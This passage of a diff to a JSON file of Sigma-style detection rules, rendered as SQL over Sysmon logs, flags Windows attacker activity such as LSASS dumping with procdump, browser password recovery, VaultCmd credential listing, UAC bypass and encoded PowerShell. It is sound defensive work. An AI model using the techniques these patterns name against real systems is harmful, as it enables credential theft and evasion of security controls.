'%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + }, + { + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "status": "experimental", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "falsepositives": [ + "Legitimate use" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ - "attack.t1218.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "status": "experimental", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate use by an administrator" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'OpenConsole.exe' OR Image LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "title": "HackTool - TruffleSnout 